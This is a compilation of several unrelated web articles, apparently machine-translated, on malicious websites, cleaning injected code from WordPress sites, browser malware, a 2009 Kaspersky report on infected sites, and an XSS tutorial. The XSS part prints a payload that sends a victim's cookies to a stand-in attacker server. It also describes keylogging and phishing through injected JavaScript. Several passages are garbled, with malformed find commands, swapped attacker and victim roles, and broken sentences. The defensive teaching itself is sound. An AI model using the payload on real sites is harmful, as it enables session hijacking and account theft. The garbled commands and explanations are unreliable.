Malicious web page. What is malicious code? What is malicious JavaScript

Nowadays, most computer attacks occur when visiting malicious web pages. The user may be tricked into providing sensitive data to a phishing site or become the victim of a drive-by download attack that exploits browser vulnerabilities. Thus, a modern antivirus should provide protection not only directly from malware, but also from dangerous web resources.

Antivirus solutions use various methods to identify sites with malware: signature database comparison and heuristic analysis. Signatures are used to pinpoint known threats, while heuristic analysis determines the likelihood of dangerous behavior. Using a virus database is a more reliable method that ensures a minimum number of false positives. However, this method does not detect unknown latest threats.

An emerging threat must first be detected and analyzed by employees of the antivirus vendor's laboratory. Based on the analysis, a corresponding signature is created that can be used to find malware. In contrast, the heuristic method is used to identify unknown threats based on suspicious behavioral factors. This method assesses the likelihood of danger, so false positives are possible.

When malicious links are detected, both methods can work simultaneously. To add a dangerous resource to the blacklist, you need to conduct an analysis by downloading the content and scanning it using an antivirus or Intrusion Detection System.

Below is the log of events of the Suricata IDS system when blocking exploits:

Example of an IDS report showing threats identified by signatures:

An example of an Ad-Aware antivirus warning when visiting a malicious site:

Heuristic analysis is performed on the client side to check which sites are being visited. Specially developed algorithms warn the user if the resource being visited meets dangerous or suspicious characteristics. These algorithms can be based on lexical analysis of content or assessment of the location of the resource. The lexical definition model is used to alert the user during phishing attacks. For example, a URL like “ http://paaypall.5gbfree.com/index.php" or " http://paypal-intern.de/secure/” are easily identified as phishing copies of the well-known payment system “Paypal”.

Resource placement analysis collects information about hosting and domain name. Based on the data received, a specialized algorithm determines the degree of danger of the site. This data typically includes geographic data, registrar information, and the person registering the domain.

Below is an example of hosting several phishing sites on one IP address:

Ultimately, despite the many ways to evaluate sites, no method can provide a 100% guarantee of protecting your system. Only the joint use of several computer security technologies can provide certain confidence in the protection of personal data.

Malicious code is code that interferes with the normal operation of a website. It can be embedded in themes, databases, files and plugins.

More videos on our channel - learn internet marketing with SEMANTICA

The result of the malicious code may be the deletion of some useful content, or its publication on a third-party resource. In this way, attackers can organize content theft. It is especially offensive if a young resource with original articles was subjected to this influence. You may get the impression that he stole content from a more senior resource.

Also, malicious code can place hidden links in a free theme to third-party pages that are accessible to search engines. These links will not always be malicious, but the weight of the main site is guaranteed to suffer.

The general purpose of all malicious codes is to disrupt the operation of web pages.

Externally, the malicious code is a chaotic set of characters. In reality, behind this nonsense there is an encrypted code containing a sequence of commands.

How malicious code gets onto the site

There are two ways how malicious code can get onto a website.

1. Downloading files and plugins from dubious and unreliable resources. Most often, encrypted links penetrate the site using these methods. Explicit code rarely enters a site this way.

2. followed by penetration. This method is considered more dangerous, because hacking a web page makes it possible to transmit not only a “one-time” code, but also entire structures with elements of a malicious program (malware).

Such code is very difficult to destroy, because... it can be restored after removal.

Checking the site for malicious code

It should be remembered that these insidious structures can appear not only in the active topic, but also in any resource file. There are several ways to find them:

Manually. To do this, you need to compare the contents of all current files with uninfected versions of the backup. Anything different must be removed.
Using security plugins. In particular, WordPress offers the Wordfence Security plugin. It has the option to scan page files for foreign code content.
With the help of hosting support. The site owner has the right to contact them with a request to scan the resource with their antivirus. As a result, they will provide a report showing the presence of infected files. These files can be cleared of extraneous constructs using a regular text editor.
Via SSH access to the site. The search itself is carried out using the commands:

find /current page directory -type f -iname "*" -exek -"eval" () \; > ./eval.log

find /current page directory -type f -iname "*" -exek-"base64" () \; > ./base64.log

find /current page directory -type f -iname "*" -exek -"file_get_contents" () \; > ./file_get_contents.log

As a result of their execution, information about suspicious files will be obtained. The list of these files will be written to a log stored in the current directory.

Checking a site for malicious code using the eval function. This PHP function runs any code, even encrypted one. As one of the arguments, the encoding type is supplied to the input of this function (usually base64_decode or str_rot13). It is thanks to the use of popular encodings that malicious code looks like a meaningless set of Latin characters.

Open the page editor.

Copy the contents of the functions.php file to the clipboard.

Paste it into any text editor (notepad).

Find the eval command.

Before removing malicious code, analyze what parameters the function expects as input. Because The parameters are received in encrypted form and need to be decrypted using decoders. Once you recognize the input parameter, you can decide where it will go in the text of the functions.php file.

Removing malicious code

Once malicious code is detected, it simply needs to be deleted as a regular line in a text file.

Protection against malicious code

In order to prevent the appearance of malicious code on the site, it is necessary to follow a number of preventive measures.

Use only proven software:

Download distributions only from trusted sources.
Run the server software update during this time.
Perform regular audits of your server's security system.
Remove outdated debugging scripts.

Set strong passwords on your server software:

Come up with a design of 12 characters, including numbers and letters of different cases.
For each service, create your own unique password.
Change your passwords every 3 months.

Control data entered by users:

Set up HTML markup filters in input fields, the contents of which will be included in the page code.
Organize a server-side check of input data for compliance with the acceptable interval.
Use WAF. Web Application Firewall is a powerful tool for protecting your website from hacker attacks.

Limit access rights to your resource.

Block or limit access to the administration tools of your website engine and its databases. Also, block access to configuration files and backup copies of production code.

Those sites that have the ability to download user files are most susceptible to such penetration of malicious code.

1. Organize protection against bots. For these purposes, many CMS are equipped with special plugins;

2. Set up validation of user input:

Prevent inserting JavaScript code inside the t> construct.
Maintain a list of safe HTML tags and filter out constructs that are not included in this list.
Analyze the links that users send.
There are special services for this, for example Safe Browsing API. It allows you to check the security of a document by URL.

How to prevent accidental placement of malicious code.

Carefully monitor the software you use:

Download libraries and CMS extensions only from trusted sources, and preferably from official websites.

Study the code of non-standard extensions that you are going to install on your website engine.

Place your advertisements very carefully:

Publish ads on your site that are offered only by reliable advertisers.

Try to post static content on your page.

Beware of affiliate programs with hidden blocks.

Is short for "Malicious Software". It is a term generally used for software installed on your computer that is designed to infiltrate or damage a computer system without the owner's informed consent. Sometimes a problem with Firefox may be a result of malware installed on your computer, that you may not be aware of. This article describes what common symptoms are and how to prevent malware from being installed and get rid of them.

Table of Contents How do I know that my Firefox problem is a result of malware?

Symptoms are various and depend on the malware but if you have one or several of these behaviors, you may have malware installed on your computer.

Some ad popups display all the time, although you"ve blocked popups. For more information on blocking popups, see.
Your searches are redirected to another site in order to feed you content from that website and you are being disallowed from blocking them. For more information, see What to do when searches take you to the wrong search website.
Your home page has been hijacked. For more information on setting your home page, see How to set the home page.
Firefox never finishes loading or can"t load certain websites . For more information, see Websites show a spinning wheel and never finish loading and Firefox cannot load certain websites .
Firefox crashes or hangs a lot.
For more information, see Firefox crashes - Troubleshoot, prevent and get help fixing crashes and Firefox hangs or is not responding - How to fix.
Firefox does not start . For more information, see Firefox won't start - find solutions.
Problems with connecting to Facebook. For more information on problems with Facebook, see Fix problems with Facebook games, chat and more.
Firefox keeps opening many tabs or windows. For more information, see Firefox repeatedly opens empty tabs or windows after you click on a link.

Unwanted toolbars have been installed. For more information on customizing Firefox, see Remove a toolbar that has taken over your Firefox search or home page and How to remove the Babylon toolbar, home page and search engine.

How do I prevent malware from being installed?

Keep your operating system and other software updated: Installation of malicious software usually takes advantage of known security vulnerabilities in other programs, which may have been patched in later versions. Make sure you are using the latest version of all software you use, either by enabling the software"s automatic update feature, if available, or by checking for updates from the software provider and by using the Windows Update feature.
Don"t install untrusted software: Some websites offer you software to accelerate your browser, to help you search the Web, to add toolbars that make things Firefox already does. Some unwanted programs also come bundled in software packages. Usually, these programs gather information on your browsing behavior that serve only people who designed them and interfere with Firefox. Make sure you install add-ons from Mozilla's add-on website and you uncheck unwanted programs in software wizards. Check to see if you have unwanted add-ons and disable or remove them .
Don"t click inside misleading pop-up windows: Many malicious websites try to install malware on your system by making images look like pop-up windows, or displaying an animation of the website scanning your computer. For more information on detecting a misleading pop -up, see Pop-up blocker settings, exceptions and troubleshooting.
Don't run a fake Firefox: Download Firefox from mozilla.org/firefox.

Run anti-virus and anti-spyware real-time protection and scan your system periodically.

Make sure your anti-virus and anti-spyware real-time protection is enabled. Scan your computer at least every month.

How do I get rid of malware?

Make sure your anti-virus and anti-spyware real-time protection is enabled. Scan your computer at least every month.

The Wikipedia article Linux malware has information and recommendations for Linux users.

Microsoft has basic free anti-virus and anti-spyware security software built-in on Windows 8 and Windows 10 for Windows 7 (see What is Microsoft Security Essentials?). If your security software hasn't detected malware, scan your system with the free malware scanning programs listed below. You should scan with all programs because each program detects different malware and make sure that you update each program to get the latest version of their databases before doing a scan.

Warning: Anti-virus and anti-spyware software may sometimes generate false positives. Consider quarantining suspicious files rather than deleting them.

Distribution of malware through websites

Introduction. Cybercrime: trends and developments

Over the past few years, the Internet has become a dangerous place. Originally created for a relatively small number of users, it has significantly exceeded the expectations of its creators. There are more than 1.5 billion Internet users in the world today, and the number is constantly growing as technology becomes more accessible.

Criminals also noticed this trend and very quickly realized that committing crimes using the Internet (now called cybercrime) has a number of significant advantages.

First, cybercrime does not involve much risk: since it has no geopolitical barriers, it is difficult for law enforcement agencies to catch criminals. Moreover, international investigations and prosecutions cost a lot of money, so such actions are usually taken only in special cases. Secondly, cybercrime is simple: the Internet offers a huge number of “instructions” for hacking computers and writing viruses, without any special knowledge or experience required. These are the two main factors that have turned cybercrime into a multi-billion dollar industry that is truly a closed ecosystem.

Both information security companies and software manufacturers are constantly fighting cybercrime. Their goal is to provide Internet users with reliable protection and create secure software. Attackers, in turn, constantly change tactics in order to counteract the countermeasures taken, which has resulted in two distinct trends.

Firstly, malware is deployed using zero-day vulnerabilities, i.e. vulnerabilities for which patches have not yet been created. With the help of such vulnerabilities, even computer systems that have all the latest updates installed, but do not have special security solutions, can be infected. Zero-day vulnerabilities are a valuable commodity (their exploitation can potentially lead to serious consequences) and are sold on the black market for tens of thousands of dollars.

Secondly, we are seeing a sharp increase in the number of malware designed specifically to steal sensitive information for the purpose of selling it on the black market: credit card numbers, bank details, passwords for sites like eBay or PayPal, and even online passwords. -games, for example, World of Warcraft.

One of the obvious reasons for the scale of cybercrime is its profitability, which will always be a driver in the creation of new cybercrime technologies.

In addition to the developments that are being carried out for the needs of cybercriminals, we note another trend - the spread of malware through the World Wide Web. Following outbreaks earlier this decade caused by email worms such as Melissa, many security companies have focused their efforts on developing solutions that can neutralize malicious attachments. This sometimes caused messages to remove all executable attachments.

However, recently the Network has become the main source of malware distribution. Malicious programs are placed on websites and then either users are tricked into manually running them, or the programs are automatically executed using exploits on infected computers.

We at Kaspersky Lab are watching what is happening with growing concern.

Statistics

For the past three years, we have been monitoring so-called clean websites (between 100,000 and 300,000) to determine at what point they became hotspots for malware. The number of monitored sites was constantly growing as new domains were registered.

The table shows the recorded maximum infection rate of web pages monitored throughout the year. A sharp increase in the proportion of infected sites is obvious: if in 2006 approximately every site out of twenty thousand was infected, then in 2009 every site out of one hundred and fifty was already infected. The percentage of infected sites fluctuates around this last figure, which may indicate that a saturation point has been reached: all websites that could be infected have been infected. However, their numbers increase or decrease as new vulnerabilities are discovered or new tools become available that allow attackers to infect new websites.

The following two tables provide data on the malware that was most frequently found on websites in 2008 and 2009.

Top 10 Malware – 2008

Top 10 Malware – 2009

In 2008, Trojan-Clicker.JS.Agent.h was discovered in a large number of cases. It is followed by Trojan-Downloader.JS.Iframe.oj with a margin of less than 1%.

Page infected with Trojan-Clicker.JS.Agent.h

Decoded Trojan-Clicker.JS.Agent.h

Trojan-Clicker.JS.Agent.h is a typical example of a mechanism that was used in 2008 and is still used (in 2009) to inject malicious code. A small piece of JavaScript code is added to the page, which is usually obfuscated to make analysis difficult. In the code shown in the figure above, obfuscation simply consists of replacing the ASCII characters that make up the malicious code with their hex codes. Once decrypted, the code usually appears as a floating frame (iframe) leading to the site where the exploits are located. The IP address the link points to may change as exploits are posted on many different sites. The main page of a malicious site usually contains exploits for IE, Firefox and Opera. Trojan-Downloader.JS.Iframe.oj, the second most frequently used malware, operates in a similar way.

There were two interesting cases in 2009 where malware was distributed through web pages. In the first case, we are talking about the Net-Worm.JS.Aspxor.a malware, which was first discovered in July 2008 and widely spread in 2009. This malware uses a special utility to find SQL vulnerabilities in websites through which it injects malicious iframes.

Another interesting case is the Gumblar malware. It was named after the Chinese domain it used to distribute exploits. The string “gumblar” in obfuscated JavaScript code planted on a website is a sure sign that the site is infected.

Example of embedding Gumblar code into a website page

After deobfuscation, Gumblar's malicious code looks like this:

Decoded Gumblar Code

The “gumblar.cn” domain was closed, which, however, did not stop cybercriminals from continuing malicious attacks from new domains.

Methods of infection and methods of distribution

Currently, there are three main ways to infect websites with malware.

The first popular method is to exploit vulnerabilities in the website itself. For example, SQL injection, which allows you to add malicious code to website pages. Attack tools such as the ASPXor Trojan clearly demonstrate how this method works: they can be used to mass scan and inject malicious code across thousands of IP addresses simultaneously. Traces of such attacks can often be seen in web server access logs.

The second method involves infecting a website developer's computer with malware that monitors the creation and download of HTML files and then injects malicious code into those files.

Finally, another method is to infect a website developer's computer or another person with access to the hosting account with a password-stealing Trojan (such as Ransom.Win32.Agent.ey). This Trojan typically accesses a server over HTTP to transmit FTP account passwords, which it collects from popular FTP clients such as FileZilla and CuteFtp. The malware component located on the server writes the received information to a SQL database. Then a special program, also located on the server, performs a login procedure for all FTP accounts, retrieves the index page, adds the Trojan-infected code there, and downloads the page back.

Since in the latter case, account information with the hosting provider becomes known to attackers, sites are often re-infected: web page developers notice the infection themselves or learn about it from site visitors, clean the page of malicious code, and the next day the page appears again infected.

Example of re-infection of a web page (*.*.148.240)

Another common situation is when information about the same vulnerability or hosting account data simultaneously falls into the hands of different cyber groups, between which a fight begins: each group tries to infect a website with its own malware. Here is an example of such a situation:

An example of multiple infections of a website (*.*.176.6) with different malware

On June 11, 2009, the website we were monitoring was clean. On July 05, 2009, the Trojan-Clicker.JS.Agent.gk malware infection occurred. On July 15, 2009, the website turns out to be infected with another malware, Trojan-Downloader.JS.Iframe.bin. Ten days later, the site is infected with another program.

This situation occurs quite often: websites can be infected simultaneously with different malware, the code of which is placed one after the other. This happens when access data falls into the hands of different cyber groups.

Below is the sequence of actions that must be taken if a website is infected with malicious code:

Determine who has access to the hosting server. Run an Internet security program scanning their computers with an up-to-date database. Remove all detected malware
Set a new strong hosting password. A strong password should consist of symbols, numbers and special characters to make it difficult to guess
Replace all infected files with clean copies
Find all backups that may contain infected files and disinfect them

Our experience shows that infected websites are often re-infected after treatment. On the other hand, this usually happens only once: if after the first infection the webmaster can limit himself to relatively superficial actions, in the event of a second infection he usually takes more serious measures to ensure the security of the site.

Evolution: Placing malware on “clean” websites

A couple of years ago, when cybercriminals began actively using the web to host malware, they usually operated through so-called bulletproof hosting or through hosting where they paid with stolen credit cards. Noticing this trend, companies working in the field of Internet security have joined forces in the fight against unscrupulous hosting providers that allow the placement of malicious resources (such as the American hosting provider McColo and the Estonian provider EstDomains. And although today there are still cases when Malware is hosted specifically on malicious sites, located, for example, in China, where it is still difficult to shut down a site, there has been an important shift towards hosting malware on “clean” and completely trustworthy domains.

Action and reaction

As we've already said, one of the most important aspects of the ongoing battle between cybercriminals and antivirus vendors is the ability to quickly respond to what the enemy is doing. Both sides are constantly changing their tactics and introducing new technologies, trying to counteract the enemy.

Most web browsers (Firefox 3.5, Chrome 2.0 and Internet Explorer 8.0) now have built-in protection in the form of a URL filter. This filter prevents the user from accessing malicious sites that contain exploits for known or unknown vulnerabilities, or that use social engineering techniques to steal personal data.

For example, Firefox and Chrome use the Google Safe Browsing API, a free service from Google for filtering URLs. At the time of writing, the Google Safe Browsing API list contained approximately 300,000 known malicious website addresses and over 20,000 phishing website addresses.

The Google Safe Browsing API takes a smart approach to URL filtering: instead of sending each URL to an external resource for verification, as Internet Explorer 8's phishing filter does, Google Safe Browsing checks URLs using their checksums. calculated using the MD5 algorithm. For this filtering method to be effective, the checksum list of malicious addresses must be updated regularly; Updates are recommended every 30 minutes. The disadvantage of this method is that the number of malicious websites is greater than the number of entries in the list. To optimize the size of the list (currently it is about 12 MB), only the most frequently encountered malicious sites are included there. This means that even if you use applications that support these technologies, your computer is still at risk of infection if you visit malicious sites that are not included in the list. Overall, the widespread adoption of secure browsing technologies shows that web browser developers have taken notice of the new trend of malware spreading through websites and are taking action in response. In fact, web browsers with built-in security are already becoming the norm.

Conclusion

Over the past three years, there has been a sharp increase in the number of legitimate websites infected with malware. Today, the number of infected sites on the Internet is one hundred times greater than three years ago. Frequently visited sites are attractive to cybercriminals because they can be used to infect a large number of computers in a short time.

Here are some simple tips for webmasters on how to secure websites:

Protect your hosting accounts with strong passwords
To upload files to servers, use the SCP/SSH/SFTP protocols instead of FTP - this way you will be protected from sending passwords over the Internet in clear text
Install an antivirus product and run a computer scan
Keep several backup copies of your site so you can restore it in case of infection.

When navigating the Internet, there are several factors that increase the risk of contracting malicious code from a website: using pirated software, ignoring updates that address vulnerabilities in the software you are using, not having an antivirus solution on your computer, and a general lack of knowledge or understanding of threats on the Internet.

Pirated software plays a significant role in the spread of malware. Pirated copies of Microsoft Windows typically do not support automatic updates released by Microsoft, which gives cybercriminals the opportunity to exploit unpatched vulnerabilities in these products.

In addition, older versions of Internet Explorer, still the most popular browser, have a large number of vulnerabilities. In most cases, Internet Explorer 6.0 without installed updates is not protected from the harmful effects of any malicious website. Because of this, it is extremely important to avoid using pirated software, especially pirated copies of Windows.

Another risk factor is working on a computer without an antivirus program installed. Even if the system itself has the latest updates, malicious code can penetrate it through zero-day vulnerabilities in third-party software. Antivirus software updates are typically released much more frequently than software patches, and provide system security at a time when third-party software vulnerabilities have not yet been patched.

And although installing updates for programs is important to maintain the required level of security, the human factor also plays an important role. For example, a user may want to watch an “interesting video” downloaded from the Internet, not suspecting that instead of the video he was given a malicious program. This trick is often used on malicious sites when exploits fail to penetrate the operating system. This example shows why users should be aware of the dangers posed by Internet threats, especially those associated with social networks (Web 2.0), which have recently been actively targeted by cybercriminals.

Don't download pirated software
Keep all software up to date: operating system, web browsers, PDF viewers, players, etc.
Install and always use an antivirus product such as Kaspersky Internet Security 2010
Make it a point to have your employees spend a few hours each month reviewing security websites, such as www.viruslist.com, where they can learn about Internet threats and protection techniques.

Finally, remember: preventing an infection is easier than curing it. Take safety measures!

And is a comprehensive tutorial on cross-site scripting.

Part One: Overview What is XSS?

Cross-site scripting ( English Cross-site scripting) is a code injection attack that allows an attacker to execute malicious JavaScript in another user's browser.

The attacker does not attack his victim directly. Instead, it exploits a vulnerability in the website the victim is visiting and injects malicious JavaScript code. In the victim's browser, the malicious JavaScript appears as a legitimate part of the website, and the website itself acts as a direct accomplice to the attacker.

Injection of malicious JavaScript code

The only way for an attacker to run malicious JavaScript in a victim's browser is to inject it into one of the pages that the victim loads from the website. This is possible if a website allows users to enter data on its pages, and the attacker can insert a string that will be detected as part of the code in the victim's browser.

The example below shows a simple server-side script that is used to display the latest comment on a site:

print ""
print "Last comment:"
print database.latestComment
print ""

The script assumes that the comment consists of text only. However, since direct user input is enabled, an attacker could leave this comment: "..." . Any user visiting the page will now receive the following response:

Last comment:
...

When the user's browser loads the page, it will execute everything, including the JavaScript code contained inside the . The attacker successfully carried out the attack.

What is malicious JavaScript?

The ability to execute JavaScript in the victim's browser may not seem particularly malicious. JavaScript runs in a very restricted environment that has extremely limited access to user and operating system files. In fact, you can open the JavaScript console in your browser right now and execute any JavaScript you want, and it is very unlikely that you will be able to cause any harm to your computer.

However, the potential for JavaScript code to act as malicious code becomes clearer when you consider the following facts:

JavaScript has access to some sensitive user information, such as cookies.
JavaScript can send HTTP requests with arbitrary content in any direction using XMLHttpRequest and other mechanisms.
JavaScript can make arbitrary changes to the HTML code of the current page using DOM manipulation techniques.

If combined, these facts can cause very serious safety violations, details to follow.

Consequences of malicious JavaScript code

In addition, the ability to execute arbitrary JavaScript in another user's browser allows an attacker to carry out the following types of attacks:

Cookie theft

An attacker can access the victim's website-related cookies using document.cookie , send them to their own server, and use them to extract sensitive information such as session IDs.

Keylogger

An attacker could register a keyboard event listener using addEventListener and then send all of the user's keystrokes to their server, potentially recording sensitive information such as passwords and credit card numbers.

Phishing

an attacker could insert a fake login form into a page using DOM manipulation, setting the form's action attributes to their own server, and then trick the user into obtaining sensitive information.

Although these attacks differ significantly, they all have one significant similarity: since the attacker injects code into the page served by the website, the malicious JavaScript is executed in the context of that website. This means that it is treated like any other script from that site: it has access to the victim's data for that website (such as cookies) and the hostname displayed in the URL bar will be the same as that of the website. For all purposes, the script is considered a legal part of the website, allowing it to do anything that the website itself can do.

This fact highlights a key issue:

If an attacker can use your website to execute arbitrary JavaScript code in other users' browsers, the security of your website and its users is compromised.

To emphasize this point, some malicious script examples in this tutorial will be left without detail, using.... This suggests that the mere presence of a script being injected by an attacker is a problem, regardless of what specific script code is actually being executed.

Part two: XSS attack Participants in the XSS attack

Before we describe in detail how an XSS attack works, we need to define the actors involved in an XSS attack. In general, there are three parties to an XSS attack: the website, the victim, and the attacker.

The website provides HTML pages to users who request them. In our examples it is located at http://website/.
- A website database is a database that stores some of the data entered by users on the pages of a website.
The victim is an ordinary user of a website who requests pages from it using their browser.
An attacker is an attacker who intends to launch an attack on a victim by exploiting an XSS vulnerability in a website.
- An attacker's server is a web server controlled by an attacker with the sole purpose of stealing the victim's confidential information. In our examples, it is located at http://attacker/.

Example attack scenario

window.location="http://attacker/?cookie="+document.cookie

This script will create an HTTP request to another URL, which will redirect the user's browser to the attacker's server. The URL includes the victim's cookies as a request parameter, when an HTTP request comes to the attacker's server, the attacker can extract these cookies from the request. Once the attacker has received the cookies, he can use them to impersonate the victim and launch a subsequent attack.

From now on, the HTML code shown above will be called a malicious string or malicious script. It is important to understand that the string itself is only malicious if it is ultimately rendered as HTML in the victim's browser, and this can only happen if there is an XSS vulnerability in the website.

How this example attack works

The diagram below shows an example of an attack by an attacker:

The attacker uses one of the website's forms to insert a malicious string into the website's database.

The victim requests a page from a website.

The site includes a malicious database string in the response and sends it to the victim.

The victim's browser executes a malicious script inside the response, sending the victim's cookie to the attacker's server.

XSS Types

The goal of an XSS attack is always to execute a malicious JavaScript script in the victim's browser. There are several fundamentally different ways to achieve this goal. XSS attacks are often divided into three types:

Stored (persistent) XSS, where the malicious string originates from the website's database.
Reflected (non-persistent) XSS, where the malicious string is generated from the victim's request.
XSS DOMs, where the vulnerability occurs in client-side code rather than server-side code.

The previous example shows a stored XSS attack. We will now describe two other types of XSS attacks: reflected XSS and DOM XSS attacks.

Reflected XSS

In a reflected XSS attack, the malicious string is part of the victim's request to the website. The site accepts and inserts this malicious string into the response sent back to the user. The diagram below illustrates this scenario:

The victim tricks the attacker into sending a URL request to the website.

The site includes a malicious string from the URL request in the response to the victim.

The victim's browser executes the malicious script contained in the response, sending the victim's cookies to the attacker's server.

How to successfully carry out a reflected XSS attack?

A reflected XSS attack may seem harmless because it requires the victim to send a request on their behalf that contains a malicious string. Since no one would voluntarily attack themselves, there seems to be no way to actually carry out the attack.

As it turns out, there are at least two common ways to get a victim to launch a reflected XSS attack against themselves:

If the user is a specific person, the attacker can send a malicious URL to the victim (for example, via email or instant messenger), and trick him into opening the link to visit the website.
If the target is a large group of users, the attacker could post a link to a malicious URL (for example on their own website or social network) and wait for visitors to click on the link.

Both of these methods are similar, and both can be more successful using URL shortening services that will mask the malicious string from users who might be able to identify it.

XSS in the DOM

XSS in the DOM is a variant of both stored and reflected XSS attacks. In this XSS attack, the malicious string is not processed by the victim's browser until the website's actual JavaScript is executed. The diagram below illustrates this scenario for a reflected XSS attack:

The attacker creates a URL containing a malicious string and sends it to the victim.

The victim tricks the attacker into sending a URL request to the website.

The site accepts the request, but does not include the malicious string in the response.

The victim's browser executes the legitimate script contained in the response, causing the malicious script to be inserted into the page.

The victim's browser executes a malicious script inserted into the page, sending the victim's cookies to the attacker's server.

What is the difference between XSS in the DOM?

In the previous examples of stored and reflected XSS attacks, the server inserts a malicious script into a page, which is then forwarded in a response to the victim. When the victim's browser receives the response, it assumes that the malicious script is part of the page's legitimate content and automatically executes it while the page is loading, just like any other script.

In the example of an XSS attack in the DOM, the malicious script is not inserted as part of the page; the only script that is automatically executed while the page is loading is a legitimate part of the page. The problem is that this legitimate script directly uses user input to add HTML to the page. Since the malicious string is inserted into the page using innerHTML , it is parsed as HTML, causing the malicious script to be executed.

This difference is small, but very important:

In traditional XSS, malicious JavaScript is executed when the page is loaded, as part of the HTML sent by the server.
In the case of XSS in the DOM, malicious JavaScript is executed after the page has loaded, causing the legitimate JavaScript page to access user input (containing the malicious string) in an insecure manner.

How does XSS work in the DOM?

There is no need for JavaScript in the previous example; the server can generate all the HTML by itself. If the server-side code did not contain vulnerabilities, the website would not be susceptible to an XSS vulnerability.

However, as web applications become more advanced, more and more HTML pages are generated using JavaScript on the client side rather than on the server. At any time the content should change without refreshing the entire page, this is possible using JavaScript. This is particularly the case when the page is refreshed after an AJAX request.

This means that XSS vulnerabilities can be present not only in the server-side code of your site, but also on the client-side JavaScript code of your site. Therefore, even with completely secure server-side code, client code may still not safely include user input when updating the DOM after the page has loaded. If this happens, the client-side code will allow an XSS attack to occur through no fault of the server-side code.

DOM-based XSS may not be visible to the server

There is a special case of an XSS attack in the DOM in which the malicious string is never sent to the website server: this occurs when the malicious string is contained in the URL identifier fragment (anything after the # symbol). Browsers don't send this part of the URL to the server, so the website can't access it using server-side code. Client-side code, however, has access to it, and thus it is possible to conduct an XSS attack through insecure processing.

This case is not limited to the fragment ID. There is other user input that is invisible to the server, such as new HTML5 features such as LocalStorage and IndexedDB.

Part three:
XSS Prevention XSS Prevention Techniques

Recall that XSS is a code injection attack: user input is mistakenly interpreted as malicious code. To prevent this type of code injection, secure input handling is required. For a web developer, there are two fundamentally different ways to perform secure input processing:

Encoding is a method that allows the user to enter data only as data and does not allow the browser to process it as code.
Validation is a way of filtering user input so that the browser interprets it as code without malicious commands.

Although these are fundamentally different XSS mitigation methods, they share several common features that are important to understand when using either one:

Context Secure input handling must be done differently depending on where on the page the user input is used.

inbound/outbound Secure input processing can be done either when your site receives input (inbound traffic) or right before the site inserts user input into the page content (outbound).

Client/Server Secure input processing can be done on either the client side or the server side, each option being needed under different circumstances.

There are many contexts on a web page where user input can be applied. For each of them, special rules must be followed to ensure that user input cannot escape its context and cannot be interpreted as malicious code. The following are the most common contexts:

Why do contexts matter?

In all of the described contexts, an XSS vulnerability could occur if user input was inserted before first encoding or validation. An attacker can inject malicious code simply by inserting a closing delimiter for this context followed by malicious code.

For example, if at some point a website includes user input directly in an HTML attribute, an attacker could inject malicious script by starting their input with a quotation mark, as shown below:

This could be prevented by simply removing all the quotes in the user input and everything would be fine, but only in this context. If the input was inserted into a different context, the closing delimiter will be different and injection will be possible. For this reason, secure input handling should always be tailored to the context where the user input will be inserted.

Handling incoming/outgoing user input

Instinctively, it would seem that XSS could be prevented by encoding or validating all user input as soon as our site receives it. This way, any malicious strings will already be neutralized whenever they are included in the page, and the HTML generation scripts won't have to worry about handling user input safely.

The problem is that, as described earlier, user input can be inserted into multiple contexts on a page. And there's no easy way to determine when user input comes into a context - how it will eventually be inserted, and the same user input often needs to be inserted in different contexts. By relying on processing incoming input to prevent XSS, we are creating a very brittle solution that will be error prone. (The legacy PHP "magic quotes" are an example of such a solution.)

Instead, outgoing input processing should be your primary line of defense against XSS because it can take into account the specific context of what user input will be inserted. To some extent, inbound validation can be used to add a secondary layer of security, but more on that later.

Where is it possible to handle user input securely?

In most modern web applications, user input is processed both on the server side and on the client side. To protect against all types of XSS, secure input handling must be done in both server-side and client-side code.

To protect against traditional XSS, secure input handling must be done in server-side code. This is done using some language supported by the server.
To protect against an XSS attack in the DOM, where the server never receives a malicious string (such as the identifier fragment attack described earlier), secure input handling must be done in client-side code. This is done using JavaScript.

Now that we've explained why context matters, why the distinction between incoming and outgoing input processing is important, and why secure input processing must be done on both sides, client side and server side, we can go on to explain. how the two types of secure input processing (encoding and validation) are actually performed.

Coding

Coding is a way out of a situation where it is necessary for the browser to interpret user input only as data, and not code. The most popular type of coding in web development is HTML masking, which converts characters such as< и >V< и >respectively.

The following pseudocode is an example of how user input (user input) can be encoded using HTML masking and then inserted into a page using a server-side script:

print ""
print "Last comment: "
print encodeHtml(userInput)
print ""

If the user enters the following line..., the resulting HTML will look like this:

Last comment:
...

Because all characters with special meaning have been escaped, the browser will not parse any part of the user input like HTML.

Coding client and server side code

When performing client-side encoding, JavaScript is always used, which has built-in functions that encode data for different contexts.

When doing the coding in your server-side code, you rely on the features available in your language or framework. Due to the large number of languages and frameworks available, this tutorial will not cover the details of coding in any specific server language or framework. However, JavaScript coding functions used on the client side are also used when writing server-side code.

Client side coding

When encoding client-side user input using JavaScript, there are several built-in methods and properties that automatically encode all data in a context-sensitive style:

The last context already mentioned above (values in JavaScript) is not included in this list because JavaScript does not provide a built-in way of encoding data that will be included in the JavaScript source code.

Encoding Limitations

Even when coding, it is possible to use malicious strings in some contexts. A clear example of this is when user input is used to provide a URL, such as in the example below:

document.querySelector("a").href = userInput

Although specifying a value on an element's href property automatically encodes it so that it becomes nothing more than an attribute value, this in itself does not prevent an attacker from inserting a URL starting with "javascript:". When a link is clicked, regardless of construction, the embedded JavaScript within the URL will be executed.

Coding is also not an effective solution when you want users to be able to use some of the HTML code on the page. An example would be a user profile page where the user can use custom HTML. If this plain HTML is encoded, the profile page will only be able to consist of plain text.

In such situations, coding must be complemented by validation, which we will look at later.

Validation

Validation is the act of filtering user input so that all malicious parts of it are removed, without having to remove all the code in it. One of the most used types of validation in web development allows you to use some HTML elements (for example, and ) while disabling others (for example, ).

There are two main characteristic checks, which differ in their implementations:

Classification Strategy User input can be classified using blacklists or whitelists.

Validation Result User input identified as malicious can be rejected or sanitized.

Classification strategy Blacklist Instinctively, it seems appropriate to perform the check by defining a forbidden pattern that should not appear in user input. If a line matches this pattern, it is marked as invalid. For example, allow users to submit custom URLs with any protocol except javascript: . This classification strategy is called.

black list

However, the blacklist has two main disadvantages:

The difficulty of accurately describing the set of all possible malicious strings is typically a very difficult task. The example policy described above cannot be successfully implemented by simply searching for the substring "javascript" because it would miss strings like "Javascript:" (where the first letter is uppercase) and "javascript:" (where the first letter is encoded as numeric character reference).

